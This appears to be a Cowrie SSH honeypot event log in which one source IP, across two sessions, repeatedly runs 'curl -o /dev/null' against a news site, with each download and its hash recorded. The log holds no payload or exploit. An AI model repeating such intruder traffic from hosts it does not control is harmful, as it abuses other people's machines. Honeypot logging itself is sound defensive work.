{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.675894Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.680144Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.681099Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.687731Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.691415Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.692386Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.711930Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.712873Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.724233Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.725404Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.754011Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.755066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.774459Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.775698Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.780569Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.783588Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.797503Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.798536Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.805743Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.814778Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.819692Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.825190Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.826091Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.836492Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.837683Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.854386Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.863909Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.865102Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.872003Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.873399Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.875691Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.906228Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.907367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:36.911409Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.912021Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.913645Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.946677Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:36.973563Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.006395Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.007648Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.010557Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.012154Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.013096Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.020212Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.030850Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.046360Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.047569Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.072314Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.078085Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.079161Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.081240Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.082222Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.086508Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.105995Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.126790Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.127877Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.131388Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.132332Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.166106Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.171970Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.172971Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.176547Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.177365Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.202109Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.217016Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.217930Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.220725Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.221521Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.259486Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.260322Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.264482Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.265261Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.295388Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.297566Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.298422Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.302708Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.303628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.336507Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.337686Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.340967Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.343495Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.344409Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.375734Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.378218Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.379223Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.388251Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.389128Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.413635Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.415969Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.416997Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.420712Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:37.425655Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:37.426500Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
